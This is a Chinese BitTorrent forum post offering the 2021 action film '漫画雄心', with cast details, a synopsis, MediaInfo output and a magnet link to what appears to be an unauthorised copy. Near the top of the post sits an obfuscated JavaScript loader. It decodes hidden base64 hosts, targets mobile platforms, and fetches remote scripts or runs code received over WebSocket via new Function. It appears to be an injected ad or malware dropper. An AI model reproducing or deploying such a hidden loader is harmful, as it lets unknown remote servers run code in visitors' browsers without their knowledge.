漫画雄心[国语配音/中文字幕].Man.Hua.Xiong.Xin.2021.1080p.WEB-DL.50FPS.H265.HDR.DDP 1.36GB

版主小s 26天前 239

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 漫画雄心
◎年  代 2021
◎产  地 中国大陆
◎语  言 汉语普通话
◎上映日期 2021-08-31(中国大陆网络)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35577811/
◎导  演 吴吞 Tun Wu (id:1367531)
◎演  员 谢孟伟 Mengwei Xie (id:1314488)
       郭佳伊 Jiayi Guo (id:1383482)
       巴萨  (id:1401896)
       闪媛媛 Yuanyuan Shan (id:1335599)
       顾权 Quan Gu (id:1374930)
       李乾锋 Qianfeng Li (id:1375394)

◎标  签 大陆 / 动作

◎简  介
  本片讲述青年热血漫画家陈唤,坚持己见,创作出一部反战和平题材的热血动作燃漫。在陈唤所创作的漫画中,主人公汪树(谢孟伟饰)化身反战使者,他为了实现战乱地区的和平,在与敌对势力抢夺“模块”的过程中,多次奋不顾身的深入险境,直面死亡的威胁,上演生死燃战,嗜血与黑暗刻画的淋漓尽致。

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : [email protected]DDQ.COM.mp4

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 1.36 GiB

  8. Duration                                 : 1 h 5 min

  9. Overall bit rate                         : 2 982 kb/s

  10. Writing application                      : Lavf58.68.100


  11. Video

  12. ID                                       : 1

  13. Format                                   : HEVC

  14. Format/Info                              : High Efficiency Video Coding

  15. Format profile                           : Main [email protected]@Main

  16. HDR format                               : SMPTE ST 2086, HDR10 compatible

  17. Codec ID                                 : hev1

  18. Codec ID/Info                            : High Efficiency Video Coding

  19. Duration                                 : 1 h 5 min

  20. Source duration                          : 1 h 5 min

  21. Bit rate                                 : 2 459 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 816 pixels

  24. Display aspect ratio                     : 2.35:1

  25. Frame rate mode                          : Variable

  26. Frame rate                               : 48.000 FPS

  27. Minimum frame rate                       : 47.974 FPS

  28. Maximum frame rate                       : 48.026 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.033

  33. Stream size                              : 1.12 GiB (82%)

  34. Source stream size                       : 1.12 GiB (82%)

  35. Color range                              : Limited

  36. Color primaries                          : BT.2020

  37. Transfer characteristics                 : PQ

  38. Matrix coefficients                      : BT.2020 non-constant

  39. Mastering display color primaries        : Display P3

  40. Mastering display luminance              : min: 0.0005 cd/m2, max: 500 cd/m2

  41. mdhd_Duration                            : 3922688

  42. Codec configuration box                  : hvcC


  43. Audio #1

  44. ID                                       : 2

  45. Format                                   : AAC LC

  46. Format/Info                              : Advanced Audio Codec Low Complexity

  47. Codec ID                                 : mp4a-40-2

  48. Duration                                 : 1 h 5 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 253 kb/s

  51. Channel(s)                               : 2 channels

  52. Channel layout                           : L R

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 46.875 FPS (1024 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 118 MiB (8%)

  57. Language                                 : Chinese

  58. Default                                  : Yes

  59. Alternate group                          : 1


  60. Audio #2

  61. ID                                       : 3

  62. Format                                   : E-AC-3

  63. Format/Info                              : Enhanced AC-3

  64. Commercial name                          : Dolby Digital Plus

  65. Codec ID                                 : ec-3

  66. Duration                                 : 1 h 5 min

  67. Bit rate mode                            : Constant

  68. Bit rate                                 : 256 kb/s

  69. Channel(s)                               : 2 channels

  70. Channel layout                           : L R

  71. Sampling rate                            : 48.0 kHz

  72. Frame rate                               : 31.250 FPS (1536 SPF)

  73. Compression mode                         : Lossy

  74. Stream size                              : 120 MiB (9%)

  75. Language                                 : Chinese

  76. Service kind                             : Complete Main

  77. Default                                  : No

  78. Alternate group                          : 1

ps:妈蛋这海报有点出戏


TAGS 动作 剧情

磁力链:
  • magnet:?xt=urn:btih:FE72EEB164864C0371AF9A85DD88B40238A3C033
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回